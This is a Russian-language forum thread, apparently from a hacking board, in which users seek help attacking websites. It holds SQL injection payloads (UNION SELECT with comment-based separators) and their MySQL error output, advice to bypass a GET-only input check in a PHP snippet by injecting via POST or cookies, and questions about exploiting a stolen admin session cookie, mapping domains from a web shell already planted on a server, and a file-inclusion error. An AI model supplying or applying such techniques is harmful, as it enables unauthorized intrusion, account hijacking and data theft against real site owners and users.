Привет. Есть уязвимость формата http://domain/'sp%20ace Ответ: Code: Database error: Invalid SQL: select * from elementpath where path='/'sp%20ace' MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'sp%20ace'' at line 1) Session halted. Проблема в том, что %20, + не преобразовываются обратно в пробелы. Можно ли такое обойти? Спасибо
тебе в другой раздел, тут вопросы по уязвимостям, а тебе в раздел "О работе"..предлагай цену и может кто и откликнется..
Через софт поимал вроде куки авторизации пользователя (может админ ) Это что нибудь даст, или мелочь? Ещё чита тему Xss для новичков только не очень разобрался...
есть шелл на нем лежит несколько сайтов, но папки с сайтами в виде логинов без домена... Есть какой-нибудь простой способ спалить домены?
Спасибо за идею, я правильно понял? Code: http://domain/'/**/union/**/select/**/1,2,3#comment выводит Code: Database error: Invalid SQL: select * from elementpath where path='/'/**/union/**/select/**/1,2,3' MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1) Session halted.
Помогите с анализом кода. в нём есть скуля? если есть как её заюзать? PHP: <?php if (preg_match('/^\d{3}$/',$_GET["id"])) { $link = mysql_connect() or die("not connect: ".mysql_error()); mysql_select_db("db1") or die("not select database: ".mysql_error()); $sq="select name from user where id ='$id'"; $q=mysql_query($sq); if(($e=mysql_error())<>'') { echo "error sql"; Header("Location:client.php"); } if (mysql_num_rows($q) == 0 ) Header("Location:client.php?e=1"); else { while($r=mysql_fetch_row($q)) { print "Здраствуйте уважаемый(ая), "; $i = 0; while ((mysql_num_fields($q) - $i) != 0) { echo "$r[$i]<br>"; $i += 1; } } } mysql_close($link); } else { Header("Location:error.php"); } ?>
#comment - это ты так коментишь прям в браузере? Если да, то попробуй так /* Ещё стоит мне кажется что нибудь перед UNION написать типа domain/test'/**/union ....
roddik, попробуй http://domain/'/**/union/**/select/**/1,2,3/* т.е. в конце комментарий повешай XENON4IK, т.к. в строчке $sq="select name from user where id ='$id'"; запрашивается просто $id то в строке адреса укажи нормальный id(например 321), а в POST запросе посылай инъекцию, или в COOKIE т.к. и пост и куки перебивают массив GET, а проверка идет только на ГЕТ. Seravin, где ты вообще preg_replace увидел?
есть скуля вида последняя кавычка учитывается в запросе в любом случае и вариант [inj] = ' union select 1,2,3-- не прокатывает. не только --, но и /* /**/ ; никакие комментарии не работают. в итоге если [inj] = 'order by 1-- выводит я подобрал количество столбцов запросом, где [inj] = '+union+select+1,2,3,' получилось но в скрипте идет следующий запрос, который выдает ошибку можно ли обойти UPDATE и как это сделать?
Попробовал в дбмс это все вбить, оказалось, что подобные комментарии заменяются на пустую строку - получается вида unionselect1,2, то есть одним словом, так что такие манипуляции с комментариями не сработают. Могу дать линк в ПМ, единственное, чего я хочу - это чтобы мне потом кто-то объяснил, как это можно было раскрутить
Это не коментарии, а один из способов разделения запроса. Скорее всего там стоит прег реплейс который заменяет ненужные символы.
Fatal error: require() [function.require]: Failed opening required 'info//var/www/web6/web/index.php' (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/web6/web/index.php on line 45 что далше????????????